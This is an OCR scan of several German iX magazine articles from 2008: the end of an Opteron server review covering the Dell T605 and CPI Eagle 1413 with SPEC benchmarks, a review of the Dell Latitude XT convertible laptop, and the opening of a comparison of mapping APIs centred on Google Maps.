ser bedienbares IPMI-Interface, über das 
der Admin den Rechner ein- und aus- 
schalten sowie virtuelle Geräte einhän- 
gen kann, das ihm somit ein Einrichten 
des Rechners aus der Ferne ermöglicht. 
Es kann je nach Anbindung zwar Stun- 
den dauern, ging aber mit einem DVD- 
Laufwerk übers Internet reibungslos 
über die Bühne. Die restlichen Funktio- 
nen betreffen die übliche Überwachung 
der Lüfterdrehzahlen und Spannungen 
sowie des Chassis. 


9 Dells T605 


Mehr Komfort bietet Dells Remote Ac- 
cess Controller 5 (DRACS5). Mozillas 
Firefox unter Linux verweigert aller- 
dings das Laden der Plug-ins, mit denen 
der Admin auf die Konsole zugreifen 
und remote Laufwerke einbinden kann. 
Der Internet Explorer unter Windows 
Vista hält die Zertifikate von DRAC5 
für nicht vertrauenswürdig. Ignoriert 
man das geflissentlich, kann man sich 
anmelden und die Plug-ins nachladen. 
Im Innern des T605 von Dell trifft 
man auf eine fast komplette Abde- 
ckung, die der Luftführung dient. In 
Abbildung 2 fehlt sie, um den Blick 
ins Innere freizugeben. Im eingebau- 
ten Zustand bändigen Halterungen die 
Kabelschlangen. Auf dem Board ist 
nur ein Sockel mit einem Opteron be- 
stückt, der andere mit einem Aufkleber 
geschützt. Der PCIe-RAID-Adapter 
Perc 6/i von Dell steuert die SAS-Plat- 
ten: zwei 15000 U/min schnelle Chee- 
tah ST3146855SS mit je 146 GByte. 
Der DVD-Writer TS H653 bleibt bei 
geschlossener Front zugänglich. Dell 
hatte neben dem Management-Modul, 
das einen weiteren PCI-Slot belegt, 
noch eine Gigabit-Ethernet-Karte einge- 


baut. Zwei redundante Netzteile sichern 
die Stromversorgung im Gerät. 

Vom Aufbau her zählt Dells T605 
zu den klassischen Floor-stand-Ser- 
vern, ausgelegt für vier SAS- oder 
SATA-Platten, ein DVD- und ein Dis- 
kettenlaufwerk. Typische Einsatzorte 
wären Kleinbetriebe, Zweigstellen und 
Büros. Da solche Server dort meist in 
offenen Räumen stehen, soll die ver- 
schließbare Frontplatte vor unbefugter 
Manipulation der Hardware schützen. 
In solchen Umgebungen sollte man 
Disketten- und DVD-Laufwerk aber 
im BIOS abschalten. Dells „Enhanced 
Business Security“ endet bei der Sei- 
tenwand: Es gibt zwar einen Schalter, 
der das Öffnen der Seitenwand regis- 
triert und die Lüfter mit lautem Getöse 
aufheulen lässt, die Verriegelung lässt 
sich aber nicht abschließen. 


Tests nicht immer 
erfolgreich 


Im Test kamen zum Einsatz: Suse Linux 
Enterprise Server 10 SP2 (SLES10) und 
Windows Server 2008 Datacenter Edi- 
tion, beide in der 64-Bit-Version. Be- 
kanntermaßen führt die Kombination 
aus Visual Studio 2008, Windows Ser- 
ver 2008 SDK 6.1 und Intels Compiler 
10.1 nur zu Teilergebnissen mit SPECs 
CPU2006. Zwei Fallen verbergen sich 
in den Installationsprozeduren. Per De- 
fault richtet das Setup von Visual Studio 
2008 nur die 32-Bit-Umgebung ein. 64- 
Bit muss der Installateur extra in einem 
Untermenü zuschalten, was man leicht 
übersieht. Sonst findet das Software 
Development Kit (SDK) von Windows 
die 64-Bit-Compiler nicht. Letztendlich 
kommt es beim Übersetzen zu Fehlern, 
weil die passenden Bibliotheken fehlen. 


Flach gehalten: In dem nur eine 
Baueinheit hohen Gehäuse ist noch 
Platz für eine PCI-Express-Karte (8x) 
frei. Das Netzteil verbirgt sich unter 
der Laufwerkabdeckung (Abb. 1). 


Unter Linux hat der Weg kaum Stol- 
persteine. Dort lässt sich mit den Com- 
pilern von Intel arbeiten, wenn die Ent- 
wicklungsumgebung vorhanden ist, was 
bei den Server-Betriebssystemen nicht 
zu den Selbstverständlichkeiten gehört. 
Völlig rund läuft das Einrichten der 
PGI-Compiler der Portland Group 
(www.pgroup.com). Zu deren Lieferum- 
fang gehören außerdem Cygwin und 
JRockit 1.6. Allerdings ist es nicht rat- 
sam, Tests wie SPECs CPU2006 aus der 
Cygwin-Shell zu starten, die sich beim 
Klick auf das PGI-Icon öffnet. Es reicht, 
nach dem Setzen der Pfade das übliche 
Command-Line-Interface zu nutzen. Die 
Unix-typischen Cygwin-Kommandos 
funktionieren trotzdem. Nach dem Edi- 


Dells T605 
© gute Ausbaubarkeit 


© unsichere Verriegelung 


CPIs Eagle 1413 
©® hohe Rechenleistung 
© Software RAID vorkonfiguriert 
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tieren der passenden Config-Datei, die 
im config-Zweig der CPU2006 V1.1 
enthalten sind, klappt das Übersetzen 
der Quellen und das Testen ohne Weite- 
res. Das mag wohl der Grund sein, wa- 
rum die Hersteller bei der SPEC ihre 
CPU2006-Resultate für den Barcelona 
2350 ausschließlich für Linux veröffent- 
licht haben, und zwar für SLESI1O. 

Eine solche Gemeinsamkeit erlaubt 
eine Analyse der veröffentlichten Re- 
sultate, mit der sich die Frage nach der 
Skalierbarkeit beim Opteron 2350 be- 
antworten lässt. Der Zuwachs mit vier 
Kernen im Verhältnis zu einem Einzel- 
lauf liegt bei 85 % im Festkomma- und 
59 % im Gleitkommabereich - insofern 
scheint sich gegenüber den Messungen 
im Februar [1] die Lage beim Floating- 
point-Rechnen verschlechtert zu haben. 
Allerdings hat Fujitsu Siemens Compu- 
ters (FSC), von denen die Speed-Werte 
(single run) stammen, keine Bindung 
an CPU und Speicher per numactl vor- 
genommen — und deren gemessener 
Zuwachs von vier auf acht Kerne 
grenzt mit 97 und 98 % ans Ideale. Mit 
anderen Worten: Programme, die über 
eine interne Parallelisierung verfügen, 
wie sie heutige Compiler einbauen, 
profitieren enorm von den Multi-Cores. 
Das zeigen alle Speed-Resultate mit 
den extrem hohen Werten im Integer- 
Test libquantum und im Floating-point- 
Test cactusADM, die beide im Rate- 
Lauf deutlich moderater abschneiden. 

Für die vier großen Brüder 8350 mit 
ihren insgesamt 16 Kernen gab es bis 
dato noch keine gültigen Ergebnisse. 
Die kann iX jetzt vorlegen. Zwar würde 
eine komplette Untersuchung den Rah- 
men sprengen, aber unter SLES10 mit 
den Compilern von Intel und denen der 
Portland Group gewonnene Resultate 
bestätigen die Voruntersuchungen: Die 
Verluste an Leistung im Integer-Bereich 
gegenüber einem Einzellauf (speed) be- 
tragen 3 % bei zwei und 11 % bei vier 


Freigelegt: In Dells Dual-CPU-Server 
Poweredge T605 ist nur ein Prozessor 
eingebaut, dessen Speicherbänke voll 
bestückt sind (Abb. 2). 
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Kernen. Unter Windows Server 2008 
maßen die mit den PGI-Compilern über- 
setzten Tests 9,2 im Speed und 117 im 
Rate — es gehen 21 % verloren. Zahlen, 
die ohne Klimmzüge mit zusätzlichen, 
nicht freien Bibliotheken zustande kom- 
men. Eine Durchsicht der Listen auf der 
SPEC-Site ergibt für den Xeon einen 
Verlust von an die 50 %: Suns Fire 
X4450 mit Intels Xeon X7350, 3 GHz 
schnell, kommt auf 21,7 im Speed, aber 
nur noch auf 174 im Rate. 

Die Frage der Energieeffizienz sollte 
sich mit dem SPECpower_ssj2008 be- 
antworten lassen, doch scheitert ein 
Vergleich mit den bisher veröffentlich- 
ten Zahlen an zwei Gegebenheiten: Zum 
einen verwenden die Hersteller eine öf- 
fentlich nicht zugängliche Power-Ver- 
sion der zugrunde liegenden Java-Ma- 
schine JRockit in der Version 1.6. 

Hinzu kommt, dass fast alle Kandi- 
daten bei der SPEC speziell für den 
Power-Benchmark abgespeckte Server 
sind, sodass die Energieaufnahme ohne 
Rechenlast auf ein Minimum sinkt und 
der Anteil der CPUs am Stromver- 
brauch im gebildeten Mittelwert deut- 
lich zu Buche schlägt. Bei den beiden 
System im iX-Labor war der Verbrauch 
im Leerlauf beim T605 recht hoch und 
mangels Power-JRockit die Resultate 
der Rechenlasten eher mager. 

Unter Linux braucht der Server 528 
Watt. Die Leistungsaufnahme sinkt im 
unbelasteten Zustand auf 276 Watt. Der 
derzeitige SPECpower-Sieger mit 1124 
ss]_ops/W, FSCs TX150, kommt unter 
voller Last mit 107 Watt, im Idle-Mo- 
dus mit 53,1 Watt aus - eine völlig an- 
dere Leistungsklasse. 

Letztendlich kommen Werte um die 
360 ssj_ops/W (Server Site Java Opera- 
tions per second per Watt) heraus, die 
nicht mit den bei der SPEC veröffent- 
lichten vergleichbar sind. 


Fazit 


Ein direkter Vergleich der beiden Ma- 
schinen gilt nur für die Prozessor-Platt- 
form. Die Wahl zwischen einem, zwei 
oder vier Quad-Cores hängt vom ge- 
planten Einsatz ab. Während Dells 
T605 der typische dienstbare Geist für 
kleine Arbeitsgruppen sein kann, war- 
tet der Eagle 1413 mit seinen 16 Re- 
chenmaschinen auf größere Aufträge, 
am besten in entsprechender Zahl. Ein- 
zig beim Preisvergleich könnte der eine 
oder andere ins Grübeln geraten, gibt es 
doch bei CPI erheblich mehr Ausstat- 
tung fürs Geld. Doch setzt das 1-U-Mo- 


Opteron-Server (Barcelona) 


CPIs Eagle 1413TR 1 U-Rackmount 
Hardware: vier Opteron 8350 (Barcelona), 

2 GHz, 512 MByte L2-Cache pro Core, 

2 GByte L3 pro Sockel, 1 GHz HT; 

16x 2 GByte DDR2-SDRAM ECC registered 
(667 MHz]; ATI ES1000 32MB Video on 
board; Nvidia MCP55Pro [SW-RAID 0, 1, 

5, 10, JBOD), ein PCle 8x, Low-Profile; 

zwei 750 GByte SATA-Platten Typ Seagate 
Barracuda ST375064NS, 7200 U/min, 

drei HD-Wechselschächte 3,5"; 8/24-fach 
DVD/CD-ROM (Slim Line); 2 x Gigabit-Ether- 
net, Netzteil 1000 Watt, zwei serielle, 

vier USB-Schnittstellen, PS/2, VGA; Manage- 
ment-Board mit 10/100-MBit-Ethernet (IPMI 2) 
Software: SIM mit KVM; im Test: Windows 
Server 2008 Datacenter 64-Bit, Suse Linux 
Enterprise Server 10 SP2, Intel Compiler 10.1, 
PGI Compiler 7.2-3 

Hersteller/Anbieter: CPl GmbH, 
www.cpigmbh.de 


Preis (Teststellung): 5400 Euro [netto] 


Dells Poweredge T605 Floor-Stand 

Hardware: Opteron 2350 (Barcelona), 

2 GHz, 512 MByte L2-Cache pro Core, 

2 GByte L3 pro Sockel, 1 GHz HT; 

8 x 1 GByte DDR2-SDRAM ECC registered 
(667 MHz]; Broadcom HT2100 und HT1000; 
ein PCle 8x, drei PCle (4x), ein PCI-X; zwei 
146 GByte SAS-Platten Seagate Cheetah 
ST3146855S$, 15 000 U/min, vier HD- 
Wechselschächte 3,5"; Dell Perc 6/i SAS- 
RAID-Adapter; 2 x Gigabit-Ethernet, on-board 
und PCle-Board von Nextrem, LOM (100 
MBit/s); DVD-Writer TS H653 von Toshiba, 
Dual-Layer; Floppy-Laufwerk; sieben USB- 
Schnittstellen (zwei frontal), VGA 

Software: DRAC35, Full Openmanage 
Hersteller/Anbieter: Dell, www.dell.de 


Preis (Teststellung): 4058 Euro (netto] 


dell deutlich Grenzen: nur ein PCle- 
Steckplatz im Low-Profile-Format und 
nur ein Netzteil. Damit passt er nur ins 
RZ, in dem USV und Speichernetze 
zur Selbstverständlichkeit gehören. Bei 
Dells T605 gibt es mehr Ausbaumög- 
lichkeiten, allerdings sollte man ihn bes- 
ser in einen abschließbaren Raum ver- 
bannen, schon allein wegen der leicht zu 
öffnenden Seitenwand. (mr) 


Literatur 


[1] Ralph Hülsenbusch, Axel Urbanski; 
SMP-Server; Quad-Quad; Tigerton 
vs. Barcelona: Server mit Intels und 
AMDs Quad-Core-CPUs; iX 3/2008, 
S.86 
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Tablet-PC 


Dells Latitude XT, Convertible Laptop 


Verwandlungs- 


künstler 


Ralph Hülsenbusch 


Etwas Besonderes stellen die Convertible schon immer dar: 
mal geschlossen, mal oben offen. Ähnliches wie für das 
Automobil gilt für die gleichnamige Laptop-Klasse - sie bietet 


ein besonderes Erlebnis. 


die Erweiterung seiner Latitude- 

Familie mit den professionellen 
Laptops an. Es ging um den ersten 
Laptop, der sich im Handumdrehen in 
einen Tablet-PC wandeln lässt: der La- 
titude XT. Die ersten Monate 2008 gin- 
gen ins Land, bis Dell ausliefern konn- 
te, und im späten Frühling traf eins in 
der Redaktion ein. 

Leicht und flach: Der ultimative Ta- 
blet-PC, heißt es auf der Produktseite 
der Latitude-Serie. Außerdem soll er 
einfach zu bedienen sein, wobei man 
das Gerät mit seiner neuen Touch- 
screen-Technik per Tastatur, Stift oder 
Finger bedienen und Daten eingeben 
kann. Dazu empfiehlt Dell Windows 
Vista Business. Von Haus aus gibt es 
die deutsche 32-Bit-Version mit Me- 
dien, ohne Aufpreis bietet Dell wahl- 
weise die 64-Bit-Variante an. Der Griff 
zu Ultimate kostet in allen Varianten 
50 Euro mehr. 


E nde vorigen Jahres kündigte Dell 


Technische Ausrüstung 
zur Miete 


Per Default bestückt Dell den Latitude 
XT mit Intels Core 2 Duo U7600 (1,2 
GHz) und einem klassischen 12,1-Zoll- 
TFT-Display, für 15 Euro mehr gibt es 
einen 1,3 GHz schnellen U7700 und 
für das LCD eine LED-Hintergrundbe- 
leuchtung (220 cd/m?). Bei einem Auf- 
preis von 40 Euro (25 Euro mehr) oder 
einer monatlichen Miete von 1 Euro soll 
der Bildschirm selbst im Sonnenlicht 
(400 cd/m?) lesbar sein. Das Grund- 
modell verfügt über 1 GByte Haupt- 
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speicher (-29 Euro), 2 GByte sind im 
Lieferumfang enthalten, 3 GByte kosten 
39 Euro beziehungsweise 2 Euro pro 
Monat zusätzlich. Bei den Festplatten 
stehen 40, 80 und 120 GByte, bei den 
Solid State Drives (SSD) 32 oder 64 
GByte zur Wahl, Letztere würde mit 
668 Euro oder 25 Euro im Monat zu 
Buche schlagen. 

Bei der Ausstattung mit Slots, An- 
schlüssen und Schaltern haben die De- 
signern nicht geknausert: Am Bild- 
schirm gibt es neben dem bei Dell 
üblichen Knopf zum Einschalten oder 
Aufwecken vier Taster für Windows- 
Security, Bildschirmausrichtung, Quick- 
Set und E-Mail - nur der für Schnell- 
konfiguration funktionierte. Daneben 
sind die beiden Mikrofone und der Sen- 
sor für das Umgebungslicht eingebaut. 


Teilbare: Zwar keine Wechselplatte, 
aber dennoch nach dem Heraus- 
nehmen des Akkus leicht zugänglich 
ist die SATA-HD. Unter dem Akku liegt 
der Slot für die SIM-Karte (Abb. 1). 


Weiter rechts folgt die Minianzeige für 
Plattenaktivitäten, Akku-Ladung, Wi-Fi 
und Bluetooth. Während die Vordersei- 
te des Laptops frei von Anschlüssen ist. 

Rechter Hand sind ein USB-An- 
schluss, ein Schalter, der den drahtlo- 
sen Betrieb komplett abschaltet, und 
ein Taster zum Aktivieren der Netzsu- 
che zu finden, daneben übereinander 
zwei Slots für Express und Secure Di- 
gital Card sowie die beiden Sub-Min- 
D-Buchsen für Audio. Auf der linken 
Seite sieht man zuerst den Lautsprecher, 
dann die Belüftungsschlitz, gefolgt von 
einem weiteren USB-Anschluss nebst 
einem für Firewire (1394), die heraus- 
ziehbare Mobilfunkantenne und die 
Garage für den Stift mit eigener LED- 
Anzeige. Die Rückseite bietet neben 
der Buchse für die Stromversorgung 
Anschlüsse für VGA, USB mit eigener 
Stromversorgung und RJ-45 für Ether- 
net. Auf der Unterseite liegt der Con- 
nector für die Docking-Station oder 
den Zusatz-Akku offen. Hinter der ver- 
schraubten Abdeckung verbergen sich 
die Speicherbausteine sowie die beiden 
Module für WLAN und WWAN in ih- 
ren PCI-Steckplätzen. Nimmt man den 
Akku heraus, gibt das den Zugang zur 
SIM-Karte und zur Festplatte frei, die 
mitten zwischen den beiden Akku- 
Packs sitzt. 

Ins Haus kam die Basis-Version mit 
Vodafone-Karte. Dell lieferte dazu 
eine Docking-Station und einen Zusatz- 
akku. Letzterer ist in eine Platte inte- 
griert, die der Docking-Station ähnelt 
und die man mit dem Latitude XT 
über den gleichen Anschluss verbin- 
det. Außerdem lag der Lieferung eine 
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Docking-Akku: 
Dell nutzt für den Zweitakku die 
Docking-Schnittstelle (Abb. 2). 


spezielle Anleitung bei, die den „Ein- 
bau“ in die mitgelieferte Tragetasche 
beschreibt, der wahrhaftig kompliziert 
ist. Nach den Vorstellungen der De- 
signer soll man den Rechner als Tab- 
let-PC so nutzen können, ohne ihn 
herausnehmen zu müssen. Der An- 
wender kann dazu die Abdeckung 
über dem Touchscreen zur Seite kKlap- 
pen und auf Wunsch per Reißver- 
schluss abtrennen. An der Unterseite 
sind zwei elastische Gurte angebracht, 
sodass man den Tablet-PC auf dem 
Unterarm tragen kann. 


Unsichere Gurte 
durch Seitenbefestigung 


In der Praxis dürfte sich das aber kaum 
bewähren, denn der Latitude wiegt 
1,61 kg, mit der Tasche kommen aber 
460 g hinzu. Und wer den Zweitakku 
mit 578 g mitnimmt, kommt auf über 
2 kg. Als Manko stellt sich die Halte- 
rung der Tragegurte heraus. Da sie seit- 
lich angebracht sind, rutscht die Tasche 
leicht von der Schulter. Außerdem sitzt 
die Abdeckung über dem Touchscreen 
zu locker. 

Durchdacht ist das Konzept für die 
Unterbringung des Stiftes: Das kostba- 
re Stück besitzt einen eigenen Schacht 
linker Hand neben der ausfahrbaren 
Antenne. Anschlüsse für Stromversor- 
gung, Audio, Firewire und USB sind 
über Aussparungen im Koffer nutzbar, 
was aber die Gefahr mit sich bringt, 
dass darüber Fremdkörper ins Innere 
gelangen können. Der Schalter fürs 
drahtlose Netz, der Taster zur Netzsu- 
che, die Karten-Slots sowie der An- 
schluss fürs Ethernet sind nur beim 
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ausgepackten Gerät erreichbar, was bei 
Letzterem durchaus sinnvoll ist. 

Von der Ausstattung her bietet das 
Gerät eine gute Grundlage. Flash-Cards 
lassen sich als Medien nutzen, dafür 
fehlt ein optisches Laufwerk, den 
DVD-Brenner gibt es erst in der Do- 
cking-Station. Ins Netz geht es per 
Ethernet oder WLAN, Bluetooth gibt 
es auf Wunsch, für den Zugang über 
das Netz der Mobilen per UTMS (Tri- 
Band-HSDPA 3.6) WWAN. 

Zum Eingeben von Daten und Be- 
dienen stehen dem Anwender vier 
Wege offen: Tastatur, Finger, Stift und 
Spracherkennung. Letztere unterstützt 
Vista von Haus aus. Sie funktioniert 
bei geringen Hintergrundgeräuschen 
mit dem eingebauten Mikrofon, die be- 
sorgten Blicke der Zuhörer muss man 
halt in Kauf nehmen. Die Tastatur hat 
die gleiche Größe wie bei handelsüb- 
lichen Keyboards, einzig die direkte 
Nachbarschaft von „Seite rauf“ und 
„Seite runter“ zur Cursor-Steuerung 
führt leicht zu Fehlbedienungen. 


Variationen mit 
Gewöhnungsbedarf 


Hingegen stellt einen das Konvertieren 
zum Touchscreen auf einige harte Pro- 
ben. Nicht nur, dass der XT beim Um- 
schwenken des Bildschirms in den Lap- 
top-Betrieb hin und wieder nicht ins 
horizontale Format zurückschaltet, die 
Reaktionen auf Stiftbewegungen kom- 
men oft unerwartet, die auf Fingerdruck 
manchmal gar nicht. Im Test funktio- 
nierte der Modus, der automatisch er- 
kennen soll, ob der Anwender Stift oder 
Finger nutzt, selten. Im Dual-Modus, in 
dem beides zugleich geht, führt ein un- 
willkürliches Berühren der Bildschirm- 
fläche, etwa beim Schreiben mit dem 
Stift, zu unbeabsichtigten Reaktion. 

Da die kapazitive Steuerung den 
Stift bereits etwa 50 Millimeter über 
der Oberfläche erkennt, braucht man 


| -Wertung 


© variabel 
© Zweitakku in Docking-Platte 


© zu schwer 
© zu teuer 
© Tasche schützt zu wenig 


© Touchscreen gewöhnungsbedürftig 


viel Feingefühl. Wer einige Zeit mit 
dem Touchscreen trainiert hat, mag da- 
mit zurechtkommen. Außerdem hilft 
noch die Konfiguration über eine Reihe 
von Slidern, mit denen sich die Emp- 
findlichkeit und die Reaktionsgeschwin- 
digkeit beeinflussen lassen. 

Gute Ergebnisse bei der Handschrift- 
erkennung kann man erreichen, wenn 
man die passende Schreibspitze wählt. 
Dell legt zwei Päckchen bei: eins mit 
Stiften, die den Eindruck einer glatten, 
und eins mit solchen, die das Gefühl 
einer rauen Schreibfläche ähnlich wie 
bei Papier vermitteln. 


Fazit 


Bei einem Convertible geht es darum, 
zwei Geräte in einem parat zu haben. 
Das dürfte sich für Entwickler lohnen, 
die Anwendungen für Tablet-PCs ent- 
wickeln. Für den Außeneinsatz, etwa 
bei einer Befragung von Reisenden im 
Flughafen, ist der Latitude XT zu 
schwer, um ihn auf dem Arm tragen zu 
können, und zu wenig durch die Trage- 
tasche geschützt. 

Dells Latitude XT gehört zu den nicht 
gerade preiswerten Business-Notebooks. 
Die Grundausstattung kostet 1629 Eu- 
ro netto, dafür gibt es den Convertible 
mit Intels Core 2 Duo U7600 CPU 
(1,2 GHz), 12,1" großem WXGA-LCD 
(1280 x 800), 2 GByte Hauptspeicher 
und 40-GByte-SATA-Platte mit Win- 
dows Vista Business. Allerdings sind 
die Aufpreise für Erweiterungen durch- 
aus moderat, falls man nicht mit einer 
64 GByte großen Solid State Disk lieb- 
äugelt; die schlägt derzeit noch mit 688 
Euro respektive 24 Euro im Monat zu 
Buche. (rh) 


 DatenundPreise 
Latitude XT Convertible PC 


Hardware: Intels Core 2 Duo U7600 CPU 
(1,2 GHz]; 2 GByte DDR2-SDRAM (max. 3 
GByte); 120 GByte SATA Samsung HS122JC 
(5400 UpM); 12,1 Zoll LCD-Display, ATI- 
Radeon-XPress-Grafikkarte; Gigabit-Ethernet, 
WIAN, Bluetooth 2.0; drei USB, Firewire, 
Express Card; VGA, DVI (Docking); TPM, Leser 
für Fingerabdruck und Secure Digital (SD) 
Software: Windows Vista Professional; 

Dell Quick Setup 


Maße und Gewicht: (Hx Bx T) 
2,6% 30x 22 cm; 1,61 kg (mit 4-Zellen- 
Akku], komplett 1,93 kg 


Preis (Teststellung): 1756 Euro [netto] 


iX 8/2008 


© Copyright by Heise Zeitschriften Verlag GmbH & Co. KG. Veröffentlichung und Vervielfältigung nur mit Genehmigung des Heise Zeitschriften Verlags. 


REPORT 


Geodienste 


artendaten lassen sich mithilfe 
K' Programmierschnittstellen 

(APIs) leicht in eigene Program- 
me oder Webanwendungen einbauen. 
Dieser Artikel legt seinen Schwer- 
punkt auf die Beschreibung der APIs 
großer und kleinerer Kartendienste. Im 
Internet gibt es zudem Vergleiche der 
Darstellung und Benutzerführung (sie- 
he iX-Link). 

Die verschiedenen Mapping-APls 
ähneln einander stark (siehe Kasten 
„Gemeinsamkeiten‘“). Ihre Basisfunk- 
tionen differieren meist lediglich in der 
Namensgebung und der Parameterüber- 
gabe. Ausgehend von einer ausführ- 
lichen Darstellung der Google-API — 
womit keine Bewertung verbunden ist 
— folgen Besonderheiten der anderen 
Schnittstellen. 


WE Google Maps 


Googles 2005 eingeführter Maps-Dienst 
deckt weite Teile der Erde ab. Für den 
Großteil Europas, Nordamerikas sowie 
Chinas und Japans gibt es detaillierte 
Straßenverzeichnisse und Navigations- 
dienste. Für viele Industrieländer stehen 
die lokalisierte Suche in Googles Bran- 
chenbuch, Routenberechnung und stel- 
lenweise aktuelle Verkehrsinformatio- 
nen zur Verfügung (siehe Abb. 1). 

Googles Programmierschnittstelle 
bietet alle Funktionen der interaktiven 
Maps-Anwendung, inklusive Routen- 
berechnung, Adresssuche (Geokodie- 
rung) und lokalisierter Branchensuche. 
Als einzige Programmiersprache unter- 
stützt sie Javascript. Mindestvorausset- 
zungen für die Arbeit damit sind folg- 
lich Kenntnisse dieser Skriptsprache, 
der DOM-API sowie objektorientierter 
Programmierung. 

Einige Zeilen Javascript-Code bil- 
den das Grundgerüst und den Kern je- 
der Google-Maps-Anwendung (siehe 
Listing 1). Am Anfang steht die Iden- 
tifizierung des Entwicklers durch sei- 
nen Schlüssel (Zeile 7). Es folgen das 
Bereitstellen und Benennen des Contai- 
ners, der die darzustellende Karte auf- 
nimmt (Zeile 21). Die eigentliche Karte 
erzeugt der Code in Zeile 11 bis 16, 
den der Onload-Handler in Zeile 20 
beim Laden des HTML-Dokuments au- 
tomatisch ausführt. 

Zentrales Element von Google Maps 
ist das GMap2-Objekt. Jede Seite kann 
mehrere davon besitzen, die jeweils ei- 
ne eigene Karte definieren. 

Mit den Bedienelementen skaliert 
und verschiebt der Nutzer die Karte, 
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Vergleich von Mapping-APls 


Das Runde 
muss aufs Flache 


Christian Wilk 


Selten war es so einfach, vom Schreibtisch aus einen 
beliebigen Ort zu finden: Man gibt die Anschrift in das 
Suchfeld eines Mapping-Programms ein und hat nach kurzer 
Zeit den passenden Kartenausschnitt vor sich. Hinter diesen 
Diensten stecken Mapping-APls, die sich nicht nur hinsichtlich 
ihrer Nutzungsbedingungen unterscheiden. 


bestimmt ihre Art (Karte, Satellitenbild 
oder Kombination), zeigt den Maßstab 
oder blendet eine Übersichtskarte ein. 
Bedienelemente fügt der Entwickler 
einer Karte mit der Methode addCon- 
trol() des GMap2-Objekts hinzu. Ne- 
ben den mitgelieferten UI-Elementen 
lassen sich selbst erstellte von der 


Klasse GControl ableiten. Sie müssen 
die Methoden initialize() und getDe- 
JfaultPosition() bereitstellen. 

Das Anzeigen der Karte alleine reicht 
jedoch nicht. Schließlich soll sie meist et- 
was veranschaulichen, zum Beispiel den 
Standort von Hotels oder die letzte Mo- 
torradtour. Zur Kennzeichnung solcher 
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Punkte auf einer Karte dienen durch 
GMarker repräsentierte Symbole. Ihnen 
ist standardmäßig ein Icon zugewiesen, 
das man an eigene Wünsche anpassen 
kann. Üblicherweise ordnet ein Event 
einem Marker ein Infofenster zu, das 
sich beim Auslösen des Events öffnet. 
Diese Fenster (GInfoWindow), von de- 
nen genau eins pro Karte existiert, Kön- 
nen beliebigen HTML-Code enthalten 
und sogar aus mehreren Tabs bestehen. 

Viele Marker verlangsamen nicht 
nur die Anzeige der Karte, sondern er- 
schweren auch die Übersicht. Beide 
Nachteile soll der MarkerManager be- 
heben. Er zeigt zum Beispiel eine Aus- 
wahl von Markern oder fasst mehrere 
zu einem zusammen, abhängig von der 
gewählten Zoomstufe. 

Linienzüge lassen sich auf einer Kar- 
te mit Polylines darstellen, geschlossene 
Bereiche mit Polygonen. Für beide kann 
der Entwickler Farbe und Strichstärke 
bestimmen, bei Polygonen zudem Farbe 
und Deckungsgrad der Füllung. Bei ge- 
setztem geodesic-Parameter zeichnet 
Google geodätische statt gerader Linien 
zwischen den Punkten - das ist die kür- 
zeste Verbindung unter Berücksichti- 
gung der Erdkrümmung. Zur Anzeige 
von Bildern eignet sich GGroundOver- 
lay, das als Parameter eine URL des Bil- 
des und seine Größe erwartet. 

Google Maps ordnet Karten nach den 
Zoomstufen O bis 19. In jeder Stufe be- 
stehen die Karten aus viermal mehr Ka- 
cheln als in der vorhergehenden. In der 
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Google Maps stellt 
für viele Teile der 
Welt detaillierte 
Straßenkarten und 
Navigationsdienste 
bereit (Abb. 1). 
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höchsten hat die Weltkarte also 4?° Ka- 
cheln. Mit GTileLayerOverlay lässt sich 
eine Ebenenüberlagerung definieren, die 
automatisch allen Kacheln eine zusätz- 
liche Bildebene zuweist. Für frei defi- 
nierbare Ebenenüberlagerungen muss 
das selbst entwickelte Objekt das Inter- 
face GOverlay implementieren. Damit 
lassen sich Dienste wie die von Goo- 
gle angebotenen Verkehrsinformatio- 
nen realisieren. 

Sogar die von Google Maps ange- 
zeigten Karten lassen sich durch ande- 
res Material ersetzen. GMapT'ype dient 
zum Definieren eines eigenen Karten- 
typs. Jedoch ist das nicht ganz trivial, 
denn den Zugriff auf die Karten und ih- 
re Kachelung muss der Entwickler 
selbst organisieren. Ein Beispiel für die 
Einbindung eigener Karten liefert Bill 
Chadwick (siehe iX-Link). 

Mit den Objekten GXmiHttp und 
GDownloadURL stehen zwei Ajax-An- 
bindungen zur Verfügung. GDownload- 
URL() übernimmt das Lesen einer Da- 
tei und erwartet als Parameter den Pfad 
zu ihr sowie eine Callback-Funktion. 
Diese erledigt die weitere Bearbeitung, 
sobald das Übertragen der Datei been- 
det ist, beispielsweise das Parsen von 
XML-Daten. 

Die Beschränkung der Ajax-Metho- 
den auf denselben Server umgeht man 
durch Einsatz eines Proxy. Als Datei- 
parameter bekommt GDownloadURL() 
dazu ein Programm (etwa ein PHP- 
Skript) übergeben, das die eigentliche 


sich jedoch im Detail. 


A-TRACT 


© Mapping-APls zeichnen sich durch viele Gemeinsamkeiten aus, unterscheiden 


© Dazu gehören neben dem Kartenmaterial die angebotenen Funktionen wie 
Geokodierung und Verkehrsinformationen sowie die Sprachschnittstellen. 


© Alle kostenpflichtigen Dienste lassen sich für eine begrenzte Zeit kostenlos testen. 


Google-Maps-Beispiel (Codelisting) 


Datenbankabfrage übernimmt. Die Er- 
gebnisse der Abfrage speichert es lokal, 
beispielsweise in einer XML-Datei, die 
die beim GDownloadURL{ )-Aufruf an- 
gegebene Funktion auswertet. 

Google Maps unterstützt KML, den 
von Google Earth benutzten XML-Dia- 
lekt [1]. Dadurch kann man via API ei- 
nerseits alle Google-Earth-Inhalte ver- 
wenden und andererseits Daten in KML 
speichern, beispielsweise eine Liste von 
Markern. 

Seit einiger Zeit stellt die API Funk- 
tionen zur Routenberechnung und zur 
Geokodierung bereit. Die für die Pro- 
grammierung relevanten Objekte sind 
GDirections und GDirectionsOptions. 
GDirections dient zur Abfrage, Speiche- 
rung und Anzeige einer Route. Abfra- 
gen lassen sich als String oder als Liste 
von Wegpunkten formulieren. Als Para- 
meter erhält das Objekt bei der Instanzi- 
ierung optional ein Kartenobjekt oder 
ein Textfeld, das die Route anzeigt. Di- 
verse GDirections-Methoden liefern die 
Charakteristika einer Strecke wie Dau- 
er, Länge, Streckenzug und Koordina- 
ten der Wegpunkte. 

Geokodierung heißt die Umwand- 
lung einer Adresse in Koordinaten, be- 
stehend aus Längen- und Breitengrad. 
Die Funktionen dafür greifen direkt auf 
Googles Server zu. Damit benutzen Pro- 
grammierer über die API denselben Da- 
tenbestand wie Googles Kartendienst. 
getLatLng() und getLocations() bilden 
das Kernstück der Geokodierung. Als 
Parameter erwarten beide einen Adress- 
String und optional eine Callback-Funk- 
tion zur Verarbeitung der Ergebnisse. 


